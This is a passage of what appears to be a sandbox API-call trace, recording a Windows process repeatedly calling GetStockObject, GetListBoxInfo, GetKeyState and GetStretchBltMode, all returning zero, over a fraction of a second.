[0114.438] GetStockObject (i=789644) returned 0x0 [0114.438] GetStockObject (i=789644) returned 0x0 [0114.439] GetStockObject (i=789644) returned 0x0 [0114.439] GetStockObject (i=789644) returned 0x0 [0114.439] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.439] GetKeyState (nVirtKey=1) returned 0 [0114.439] GetStretchBltMode (hdc=0x1) returned 0 [0114.439] GetStockObject (i=789644) returned 0x0 [0114.439] GetStockObject (i=789644) returned 0x0 [0114.439] GetStockObject (i=789644) returned 0x0 [0114.439] GetStockObject (i=789644) returned 0x0 [0114.439] GetStockObject (i=789644) returned 0x0 [0114.439] GetStockObject (i=789644) returned 0x0 [0114.439] GetStockObject (i=789644) returned 0x0 [0114.439] GetStockObject (i=789644) returned 0x0 [0114.439] GetStockObject (i=789644) returned 0x0 [0114.439] GetStockObject (i=789644) returned 0x0 [0114.439] GetStockObject (i=789644) returned 0x0 [0114.439] GetStockObject (i=789644) returned 0x0 [0114.439] GetStockObject (i=789644) returned 0x0 [0114.439] GetStockObject (i=789644) returned 0x0 [0114.439] GetStockObject (i=789644) returned 0x0 [0114.439] GetStockObject (i=789644) returned 0x0 [0114.439] GetStockObject (i=789644) returned 0x0 [0114.439] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.439] GetKeyState (nVirtKey=1) returned 0 [0114.439] GetStretchBltMode (hdc=0x1) returned 0 [0114.439] GetStockObject (i=789644) returned 0x0 [0114.439] GetStockObject (i=789644) returned 0x0 [0114.439] GetStockObject (i=789644) returned 0x0 [0114.439] GetStockObject (i=789644) returned 0x0 [0114.439] GetStockObject (i=789644) returned 0x0 [0114.440] GetStockObject (i=789644) returned 0x0 [0114.440] GetStockObject (i=789644) returned 0x0 [0114.440] GetStockObject (i=789644) returned 0x0 [0114.440] GetStockObject (i=789644) returned 0x0 [0114.440] GetStockObject (i=789644) returned 0x0 [0114.440] GetStockObject (i=789644) returned 0x0 [0114.440] GetStockObject (i=789644) returned 0x0 [0114.440] GetStockObject (i=789644) returned 0x0 [0114.440] GetStockObject (i=789644) returned 0x0 [0114.440] GetStockObject (i=789644) returned 0x0 [0114.440] GetStockObject (i=789644) returned 0x0 [0114.440] GetStockObject (i=789644) returned 0x0 [0114.440] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.440] GetKeyState (nVirtKey=1) returned 0 [0114.440] GetStretchBltMode (hdc=0x1) returned 0 [0114.440] GetStockObject (i=789644) returned 0x0 [0114.440] GetStockObject (i=789644) returned 0x0 [0114.440] GetStockObject (i=789644) returned 0x0 [0114.440] GetStockObject (i=789644) returned 0x0 [0114.440] GetStockObject (i=789644) returned 0x0 [0114.440] GetStockObject (i=789644) returned 0x0 [0114.440] GetStockObject (i=789644) returned 0x0 [0114.440] GetStockObject (i=789644) returned 0x0 [0114.440] GetStockObject (i=789644) returned 0x0 [0114.440] GetStockObject (i=789644) returned 0x0 [0114.440] GetStockObject (i=789644) returned 0x0 [0114.440] GetStockObject (i=789644) returned 0x0 [0114.440] GetStockObject (i=789644) returned 0x0 [0114.440] GetStockObject (i=789644) returned 0x0 [0114.440] GetStockObject (i=789644) returned 0x0 [0114.440] GetStockObject (i=789644) returned 0x0 [0114.440] GetStockObject (i=789644) returned 0x0 [0114.440] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.440] GetKeyState (nVirtKey=1) returned 0 [0114.440] GetStretchBltMode (hdc=0x1) returned 0 [0114.440] GetStockObject (i=789644) returned 0x0 [0114.440] GetStockObject (i=789644) returned 0x0 [0114.441] GetStockObject (i=789644) returned 0x0 [0114.441] GetStockObject (i=789644) returned 0x0 [0114.441] GetStockObject (i=789644) returned 0x0 [0114.441] GetStockObject (i=789644) returned 0x0 [0114.441] GetStockObject (i=789644) returned 0x0 [0114.441] GetStockObject (i=789644) returned 0x0 [0114.441] GetStockObject (i=789644) returned 0x0 [0114.441] GetStockObject (i=789644) returned 0x0 [0114.441] GetStockObject (i=789644) returned 0x0 [0114.441] GetStockObject (i=789644) returned 0x0 [0114.441] GetStockObject (i=789644) returned 0x0 [0114.441] GetStockObject (i=789644) returned 0x0 [0114.441] GetStockObject (i=789644) returned 0x0 [0114.441] GetStockObject (i=789644) returned 0x0 [0114.441] GetStockObject (i=789644) returned 0x0 [0114.441] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.441] GetKeyState (nVirtKey=1) returned 0 [0114.441] GetStretchBltMode (hdc=0x1) returned 0 [0114.441] GetStockObject (i=789644) returned 0x0 [0114.441] GetStockObject (i=789644) returned 0x0 [0114.441] GetStockObject (i=789644) returned 0x0 [0114.441] GetStockObject (i=789644) returned 0x0 [0114.441] GetStockObject (i=789644) returned 0x0 [0114.441] GetStockObject (i=789644) returned 0x0 [0114.441] GetStockObject (i=789644) returned 0x0 [0114.441] GetStockObject (i=789644) returned 0x0 [0114.441] GetStockObject (i=789644) returned 0x0 [0114.441] GetStockObject (i=789644) returned 0x0 [0114.441] GetStockObject (i=789644) returned 0x0 [0114.441] GetStockObject (i=789644) returned 0x0 [0114.441] GetStockObject (i=789644) returned 0x0 [0114.441] GetStockObject (i=789644) returned 0x0 [0114.441] GetStockObject (i=789644) returned 0x0 [0114.441] GetStockObject (i=789644) returned 0x0 [0114.441] GetStockObject (i=789644) returned 0x0 [0114.441] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.442] GetKeyState (nVirtKey=1) returned 0 [0114.442] GetStretchBltMode (hdc=0x1) returned 0 [0114.442] GetStockObject (i=789644) returned 0x0 [0114.442] GetStockObject (i=789644) returned 0x0 [0114.442] GetStockObject (i=789644) returned 0x0 [0114.442] GetStockObject (i=789644) returned 0x0 [0114.442] GetStockObject (i=789644) returned 0x0 [0114.442] GetStockObject (i=789644) returned 0x0 [0114.442] GetStockObject (i=789644) returned 0x0 [0114.442] GetStockObject (i=789644) returned 0x0 [0114.442] GetStockObject (i=789644) returned 0x0 [0114.442] GetStockObject (i=789644) returned 0x0 [0114.442] GetStockObject (i=789644) returned 0x0 [0114.442] GetStockObject (i=789644) returned 0x0 [0114.442] GetStockObject (i=789644) returned 0x0 [0114.442] GetStockObject (i=789644) returned 0x0 [0114.442] GetStockObject (i=789644) returned 0x0 [0114.442] GetStockObject (i=789644) returned 0x0 [0114.442] GetStockObject (i=789644) returned 0x0 [0114.442] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.442] GetKeyState (nVirtKey=1) returned 0 [0114.442] GetStretchBltMode (hdc=0x1) returned 0 [0114.442] GetStockObject (i=789644) returned 0x0 [0114.442] GetStockObject (i=789644) returned 0x0 [0114.442] GetStockObject (i=789644) returned 0x0 [0114.442] GetStockObject (i=789644) returned 0x0 [0114.442] GetStockObject (i=789644) returned 0x0 [0114.442] GetStockObject (i=789644) returned 0x0 [0114.442] GetStockObject (i=789644) returned 0x0 [0114.442] GetStockObject (i=789644) returned 0x0 [0114.442] GetStockObject (i=789644) returned 0x0 [0114.442] GetStockObject (i=789644) returned 0x0 [0114.442] GetStockObject (i=789644) returned 0x0 [0114.442] GetStockObject (i=789644) returned 0x0 [0114.442] GetStockObject (i=789644) returned 0x0 [0114.442] GetStockObject (i=789644) returned 0x0 [0114.442] GetStockObject (i=789644) returned 0x0 [0114.442] GetStockObject (i=789644) returned 0x0 [0114.443] GetStockObject (i=789644) returned 0x0 [0114.443] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.443] GetKeyState (nVirtKey=1) returned 0 [0114.443] GetStretchBltMode (hdc=0x1) returned 0 [0114.443] GetStockObject (i=789644) returned 0x0 [0114.443] GetStockObject (i=789644) returned 0x0 [0114.443] GetStockObject (i=789644) returned 0x0 [0114.443] GetStockObject (i=789644) returned 0x0 [0114.443] GetStockObject (i=789644) returned 0x0 [0114.443] GetStockObject (i=789644) returned 0x0 [0114.443] GetStockObject (i=789644) returned 0x0 [0114.443] GetStockObject (i=789644) returned 0x0 [0114.443] GetStockObject (i=789644) returned 0x0 [0114.443] GetStockObject (i=789644) returned 0x0 [0114.443] GetStockObject (i=789644) returned 0x0 [0114.443] GetStockObject (i=789644) returned 0x0 [0114.443] GetStockObject (i=789644) returned 0x0 [0114.443] GetStockObject (i=789644) returned 0x0 [0114.443] GetStockObject (i=789644) returned 0x0 [0114.443] GetStockObject (i=789644) returned 0x0 [0114.443] GetStockObject (i=789644) returned 0x0 [0114.443] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.443] GetKeyState (nVirtKey=1) returned 0 [0114.443] GetStretchBltMode (hdc=0x1) returned 0 [0114.443] GetStockObject (i=789644) returned 0x0 [0114.443] GetStockObject (i=789644) returned 0x0 [0114.443] GetStockObject (i=789644) returned 0x0 [0114.443] GetStockObject (i=789644) returned 0x0 [0114.443] GetStockObject (i=789644) returned 0x0 [0114.443] GetStockObject (i=789644) returned 0x0 [0114.443] GetStockObject (i=789644) returned 0x0 [0114.443] GetStockObject (i=789644) returned 0x0 [0114.443] GetStockObject (i=789644) returned 0x0 [0114.443] GetStockObject (i=789644) returned 0x0 [0114.443] GetStockObject (i=789644) returned 0x0 [0114.443] GetStockObject (i=789644) returned 0x0 [0114.443] GetStockObject (i=789644) returned 0x0 [0114.443] GetStockObject (i=789644) returned 0x0 [0114.443] GetStockObject (i=789644) returned 0x0 [0114.444] GetStockObject (i=789644) returned 0x0 [0114.444] GetStockObject (i=789644) returned 0x0 [0114.444] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.444] GetKeyState (nVirtKey=1) returned 0 [0114.444] GetStretchBltMode (hdc=0x1) returned 0 [0114.444] GetStockObject (i=789644) returned 0x0 [0114.444] GetStockObject (i=789644) returned 0x0 [0114.444] GetStockObject (i=789644) returned 0x0 [0114.444] GetStockObject (i=789644) returned 0x0 [0114.444] GetStockObject (i=789644) returned 0x0 [0114.444] GetStockObject (i=789644) returned 0x0 [0114.444] GetStockObject (i=789644) returned 0x0 [0114.444] GetStockObject (i=789644) returned 0x0 [0114.444] GetStockObject (i=789644) returned 0x0 [0114.444] GetStockObject (i=789644) returned 0x0 [0114.444] GetStockObject (i=789644) returned 0x0 [0114.444] GetStockObject (i=789644) returned 0x0 [0114.444] GetStockObject (i=789644) returned 0x0 [0114.444] GetStockObject (i=789644) returned 0x0 [0114.444] GetStockObject (i=789644) returned 0x0 [0114.444] GetStockObject (i=789644) returned 0x0 [0114.444] GetStockObject (i=789644) returned 0x0 [0114.444] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.444] GetKeyState (nVirtKey=1) returned 0 [0114.444] GetStretchBltMode (hdc=0x1) returned 0 [0114.444] GetStockObject (i=789644) returned 0x0 [0114.444] GetStockObject (i=789644) returned 0x0 [0114.444] GetStockObject (i=789644) returned 0x0 [0114.444] GetStockObject (i=789644) returned 0x0 [0114.444] GetStockObject (i=789644) returned 0x0 [0114.444] GetStockObject (i=789644) returned 0x0 [0114.444] GetStockObject (i=789644) returned 0x0 [0114.444] GetStockObject (i=789644) returned 0x0 [0114.444] GetStockObject (i=789644) returned 0x0 [0114.444] GetStockObject (i=789644) returned 0x0 [0114.444] GetStockObject (i=789644) returned 0x0 [0114.444] GetStockObject (i=789644) returned 0x0 [0114.444] GetStockObject (i=789644) returned 0x0 [0114.444] GetStockObject (i=789644) returned 0x0 [0114.444] GetStockObject (i=789644) returned 0x0 [0114.444] GetStockObject (i=789644) returned 0x0 [0114.444] GetStockObject (i=789644) returned 0x0 [0114.445] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.445] GetKeyState (nVirtKey=1) returned 0 [0114.445] GetStretchBltMode (hdc=0x1) returned 0 [0114.445] GetStockObject (i=789644) returned 0x0 [0114.445] GetStockObject (i=789644) returned 0x0 [0114.445] GetStockObject (i=789644) returned 0x0 [0114.445] GetStockObject (i=789644) returned 0x0 [0114.445] GetStockObject (i=789644) returned 0x0 [0114.445] GetStockObject (i=789644) returned 0x0 [0114.445] GetStockObject (i=789644) returned 0x0 [0114.445] GetStockObject (i=789644) returned 0x0 [0114.445] GetStockObject (i=789644) returned 0x0 [0114.445] GetStockObject (i=789644) returned 0x0 [0114.445] GetStockObject (i=789644) returned 0x0 [0114.445] GetStockObject (i=789644) returned 0x0 [0114.445] GetStockObject (i=789644) returned 0x0 [0114.445] GetStockObject (i=789644) returned 0x0 [0114.445] GetStockObject (i=789644) returned 0x0 [0114.445] GetStockObject (i=789644) returned 0x0 [0114.445] GetStockObject (i=789644) returned 0x0 [0114.445] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.445] GetKeyState (nVirtKey=1) returned 0 [0114.445] GetStretchBltMode (hdc=0x1) returned 0 [0114.445] GetStockObject (i=789644) returned 0x0 [0114.445] GetStockObject (i=789644) returned 0x0 [0114.445] GetStockObject (i=789644) returned 0x0 [0114.445] GetStockObject (i=789644) returned 0x0 [0114.445] GetStockObject (i=789644) returned 0x0 [0114.445] GetStockObject (i=789644) returned 0x0 [0114.445] GetStockObject (i=789644) returned 0x0 [0114.445] GetStockObject (i=789644) returned 0x0 [0114.445] GetStockObject (i=789644) returned 0x0 [0114.445] GetStockObject (i=789644) returned 0x0 [0114.445] GetStockObject (i=789644) returned 0x0 [0114.445] GetStockObject (i=789644) returned 0x0 [0114.445] GetStockObject (i=789644) returned 0x0 [0114.445] GetStockObject (i=789644) returned 0x0 [0114.445] GetStockObject (i=789644) returned 0x0 [0114.445] GetStockObject (i=789644) returned 0x0 [0114.445] GetStockObject (i=789644) returned 0x0 [0114.445] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.446] GetKeyState (nVirtKey=1) returned 0 [0114.446] GetStretchBltMode (hdc=0x1) returned 0 [0114.446] GetStockObject (i=789644) returned 0x0 [0114.446] GetStockObject (i=789644) returned 0x0 [0114.446] GetStockObject (i=789644) returned 0x0 [0114.446] GetStockObject (i=789644) returned 0x0 [0114.446] GetStockObject (i=789644) returned 0x0 [0114.446] GetStockObject (i=789644) returned 0x0 [0114.446] GetStockObject (i=789644) returned 0x0 [0114.446] GetStockObject (i=789644) returned 0x0 [0114.446] GetStockObject (i=789644) returned 0x0 [0114.446] GetStockObject (i=789644) returned 0x0 [0114.446] GetStockObject (i=789644) returned 0x0 [0114.446] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.446] GetKeyState (nVirtKey=1) returned 0 [0114.446] GetStretchBltMode (hdc=0x1) returned 0 [0114.446] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.446] GetKeyState (nVirtKey=1) returned 0 [0114.446] GetStretchBltMode (hdc=0x1) returned 0 [0114.446] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.446] GetKeyState (nVirtKey=1) returned 0 [0114.446] GetStretchBltMode (hdc=0x1) returned 0 [0114.446] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.446] GetKeyState (nVirtKey=1) returned 0 [0114.446] GetStretchBltMode (hdc=0x1) returned 0 [0114.446] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.447] GetKeyState (nVirtKey=1) returned 0 [0114.447] GetStretchBltMode (hdc=0x1) returned 0 [0114.447] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.447] GetKeyState (nVirtKey=1) returned 0 [0114.447] GetStretchBltMode (hdc=0x1) returned 0 [0114.447] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.447] GetKeyState (nVirtKey=1) returned 0 [0114.447] GetStretchBltMode (hdc=0x1) returned 0 [0114.636] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.636] GetKeyState (nVirtKey=1) returned 0 [0114.636] GetStretchBltMode (hdc=0x1) returned 0 [0114.636] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.636] GetKeyState (nVirtKey=1) returned 0 [0114.636] GetStretchBltMode (hdc=0x1) returned 0 [0114.636] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.636] GetKeyState (nVirtKey=1) returned 0 [0114.636] GetStretchBltMode (hdc=0x1) returned 0 [0114.636] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.636] GetKeyState (nVirtKey=1) returned 0 [0114.636] GetStretchBltMode (hdc=0x1) returned 0 [0114.636] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.636] GetKeyState (nVirtKey=1) returned 0 [0114.636] GetStretchBltMode (hdc=0x1) returned 0 [0114.636] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.636] GetKeyState (nVirtKey=1) returned 0 [0114.636] GetStretchBltMode (hdc=0x1) returned 0 [0114.637] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.637] GetKeyState (nVirtKey=1) returned 0 [0114.637] GetStretchBltMode (hdc=0x1) returned 0 [0114.637] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.637] GetKeyState (nVirtKey=1) returned 0 [0114.637] GetStretchBltMode (hdc=0x1) returned 0 [0114.637] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.637] GetKeyState (nVirtKey=1) returned 0 [0114.637] GetStretchBltMode (hdc=0x1) returned 0 [0114.637] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.637] GetKeyState (nVirtKey=1) returned 0 [0114.637] GetStretchBltMode (hdc=0x1) returned 0 [0114.637] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.637] GetKeyState (nVirtKey=1) returned 0 [0114.637] GetStretchBltMode (hdc=0x1) returned 0 [0114.637] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.637] GetKeyState (nVirtKey=1) returned 0 [0114.637] GetStretchBltMode (hdc=0x1) returned 0 [0114.637] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.637] GetKeyState (nVirtKey=1) returned 0 [0114.637] GetStretchBltMode (hdc=0x1) returned 0 [0114.637] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.637] GetKeyState (nVirtKey=1) returned 0 [0114.637] GetStretchBltMode (hdc=0x1) returned 0 [0114.637] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.637] GetKeyState (nVirtKey=1) returned 0 [0114.638] GetStretchBltMode (hdc=0x1) returned 0 [0114.638] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.638] GetKeyState (nVirtKey=1) returned 0 [0114.638] GetStretchBltMode (hdc=0x1) returned 0 [0114.638] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.638] GetKeyState (nVirtKey=1) returned 0 [0114.638] GetStretchBltMode (hdc=0x1) returned 0 [0114.638] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.638] GetKeyState (nVirtKey=1) returned 0 [0114.638] GetStretchBltMode (hdc=0x1) returned 0 [0114.638] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.638] GetKeyState (nVirtKey=1) returned 0 [0114.638] GetStretchBltMode (hdc=0x1) returned 0 [0114.638] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.638] GetKeyState (nVirtKey=1) returned 0 [0114.638] GetStretchBltMode (hdc=0x1) returned 0 [0114.638] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.638] GetKeyState (nVirtKey=1) returned 0 [0114.638] GetStretchBltMode (hdc=0x1) returned 0 [0114.638] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.638] GetKeyState (nVirtKey=1) returned 0 [0114.638] GetStretchBltMode (hdc=0x1) returned 0 [0114.638] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.638] GetKeyState (nVirtKey=1) returned 0 [0114.638] GetStretchBltMode (hdc=0x1) returned 0 [0114.639] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.639] GetKeyState (nVirtKey=1) returned 0 [0114.639] GetStretchBltMode (hdc=0x1) returned 0 [0114.639] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.639] GetKeyState (nVirtKey=1) returned 0 [0114.639] GetStretchBltMode (hdc=0x1) returned 0 [0114.639] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.639] GetKeyState (nVirtKey=1) returned 0 [0114.639] GetStretchBltMode (hdc=0x1) returned 0 [0114.639] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.639] GetKeyState (nVirtKey=1) returned 0 [0114.639] GetStretchBltMode (hdc=0x1) returned 0 [0114.639] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.639] GetKeyState (nVirtKey=1) returned 0 [0114.639] GetStretchBltMode (hdc=0x1) returned 0 [0114.639] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.639] GetKeyState (nVirtKey=1) returned 0 [0114.639] GetStretchBltMode (hdc=0x1) returned 0 [0114.639] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.640] GetKeyState (nVirtKey=1) returned 0 [0114.640] GetStretchBltMode (hdc=0x1) returned 0 [0114.640] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.640] GetKeyState (nVirtKey=1) returned 0 [0114.640] GetStretchBltMode (hdc=0x1) returned 0 [0114.640] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.640] GetKeyState (nVirtKey=1) returned 0 [0114.640] GetStretchBltMode (hdc=0x1) returned 0 [0114.640] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.640] GetKeyState (nVirtKey=1) returned 0 [0114.640] GetStretchBltMode (hdc=0x1) returned 0 [0114.640] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.640] GetKeyState (nVirtKey=1) returned 0 [0114.640] GetStretchBltMode (hdc=0x1) returned 0 [0114.640] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.640] GetKeyState (nVirtKey=1) returned 0 [0114.640] GetStretchBltMode (hdc=0x1) returned 0 [0114.640] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.640] GetKeyState (nVirtKey=1) returned 0 [0114.640] GetStretchBltMode (hdc=0x1) returned 0 [0114.640] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.640] GetKeyState (nVirtKey=1) returned 0 [0114.641] GetStretchBltMode (hdc=0x1) returned 0 [0114.641] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.641] GetKeyState (nVirtKey=1) returned 0 [0114.641] GetStretchBltMode (hdc=0x1) returned 0 [0114.641] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.641] GetKeyState (nVirtKey=1) returned 0 [0114.641] GetStretchBltMode (hdc=0x1) returned 0 [0114.641] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.641] GetKeyState (nVirtKey=1) returned 0 [0114.641] GetStretchBltMode (hdc=0x1) returned 0 [0114.641] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.641] GetKeyState (nVirtKey=1) returned 0 [0114.641] GetStretchBltMode (hdc=0x1) returned 0 [0114.641] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.641] GetKeyState (nVirtKey=1) returned 0 [0114.641] GetStretchBltMode (hdc=0x1) returned 0 [0114.641] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.641] GetKeyState (nVirtKey=1) returned 0 [0114.641] GetStretchBltMode (hdc=0x1) returned 0 [0114.641] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.641] GetKeyState (nVirtKey=1) returned 0 [0114.641] GetStretchBltMode (hdc=0x1) returned 0 [0114.641] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.641] GetKeyState (nVirtKey=1) returned 0 [0114.641] GetStretchBltMode (hdc=0x1) returned 0 [0114.642] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.642] GetKeyState (nVirtKey=1) returned 0 [0114.642] GetStretchBltMode (hdc=0x1) returned 0 [0114.642] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.642] GetKeyState (nVirtKey=1) returned 0 [0114.642] GetStretchBltMode (hdc=0x1) returned 0 [0114.642] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.642] GetKeyState (nVirtKey=1) returned 0 [0114.642] GetStretchBltMode (hdc=0x1) returned 0 [0114.642] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.642] GetKeyState (nVirtKey=1) returned 0 [0114.642] GetStretchBltMode (hdc=0x1) returned 0 [0114.642] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.642] GetKeyState (nVirtKey=1) returned 0 [0114.642] GetStretchBltMode (hdc=0x1) returned 0 [0114.642] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.642] GetKeyState (nVirtKey=1) returned 0 [0114.642] GetStretchBltMode (hdc=0x1) returned 0 [0114.642] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.642] GetKeyState (nVirtKey=1) returned 0 [0114.642] GetStretchBltMode (hdc=0x1) returned 0 [0114.642] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.642] GetKeyState (nVirtKey=1) returned 0 [0114.642] GetStretchBltMode (hdc=0x1) returned 0 [0114.642] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.642] GetKeyState (nVirtKey=1) returned 0 [0114.643] GetStretchBltMode (hdc=0x1) returned 0 [0114.643] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.643] GetKeyState (nVirtKey=1) returned 0 [0114.643] GetStretchBltMode (hdc=0x1) returned 0 [0114.643] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.643] GetKeyState (nVirtKey=1) returned 0 [0114.643] GetStretchBltMode (hdc=0x1) returned 0 [0114.643] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.643] GetKeyState (nVirtKey=1) returned 0 [0114.643] GetStretchBltMode (hdc=0x1) returned 0 [0114.643] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.643] GetKeyState (nVirtKey=1) returned 0 [0114.643] GetStretchBltMode (hdc=0x1) returned 0 [0114.643] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.643] GetKeyState (nVirtKey=1) returned 0 [0114.643] GetStretchBltMode (hdc=0x1) returned 0 [0114.643] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.643] GetKeyState (nVirtKey=1) returned 0 [0114.643] GetStretchBltMode (hdc=0x1) returned 0 [0114.643] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.643] GetKeyState (nVirtKey=1) returned 0 [0114.643] GetStretchBltMode (hdc=0x1) returned 0 [0114.643] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.643] GetKeyState (nVirtKey=1) returned 0 [0114.643] GetStretchBltMode (hdc=0x1) returned 0 [0114.644] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.644] GetKeyState (nVirtKey=1) returned 0 [0114.644] GetStretchBltMode (hdc=0x1) returned 0 [0114.644] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.644] GetKeyState (nVirtKey=1) returned 0 [0114.644] GetStretchBltMode (hdc=0x1) returned 0 [0114.644] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.644] GetKeyState (nVirtKey=1) returned 0 [0114.644] GetStretchBltMode (hdc=0x1) returned 0 [0114.644] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.644] GetKeyState (nVirtKey=1) returned 0 [0114.644] GetStretchBltMode (hdc=0x1) returned 0 [0114.644] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.644] GetKeyState (nVirtKey=1) returned 0 [0114.644] GetStretchBltMode (hdc=0x1) returned 0 [0114.644] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.644] GetKeyState (nVirtKey=1) returned 0 [0114.644] GetStretchBltMode (hdc=0x1) returned 0 [0114.644] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.644] GetKeyState (nVirtKey=1) returned 0 [0114.644] GetStretchBltMode (hdc=0x1) returned 0 [0114.644] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.644] GetKeyState (nVirtKey=1) returned 0 [0114.644] GetStretchBltMode (hdc=0x1) returned 0 [0114.644] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.644] GetKeyState (nVirtKey=1) returned 0 [0114.644] GetStretchBltMode (hdc=0x1) returned 0 [0114.645] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.645] GetKeyState (nVirtKey=1) returned 0 [0114.645] GetStretchBltMode (hdc=0x1) returned 0 [0114.645] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.645] GetKeyState (nVirtKey=1) returned 0 [0114.645] GetStretchBltMode (hdc=0x1) returned 0 [0114.645] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.645] GetKeyState (nVirtKey=1) returned 0 [0114.645] GetStretchBltMode (hdc=0x1) returned 0 [0114.645] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.645] GetKeyState (nVirtKey=1) returned 0 [0114.645] GetStretchBltMode (hdc=0x1) returned 0 [0114.645] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.645] GetKeyState (nVirtKey=1) returned 0 [0114.645] GetStretchBltMode (hdc=0x1) returned 0 [0114.645] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.645] GetKeyState (nVirtKey=1) returned 0 [0114.645] GetStretchBltMode (hdc=0x1) returned 0 [0114.645] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.645] GetKeyState (nVirtKey=1) returned 0 [0114.645] GetStretchBltMode (hdc=0x1) returned 0 [0114.645] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.645] GetKeyState (nVirtKey=1) returned 0 [0114.645] GetStretchBltMode (hdc=0x1) returned 0 [0114.645] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.646] GetKeyState (nVirtKey=1) returned 0 [0114.646] GetStretchBltMode (hdc=0x1) returned 0 [0114.646] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.646] GetKeyState (nVirtKey=1) returned 0 [0114.646] GetStretchBltMode (hdc=0x1) returned 0 [0114.646] GetListBoxInfo (hwnd=0x0) returned 0x0 [0114.646] GetKeyState (nVirtKey=1) returned 0 [0114.646] GetStretchBltMode (hdc=0x1) returned 0 [0114.646] GetListBoxInfo (hwnd=0x0) returned 0x0 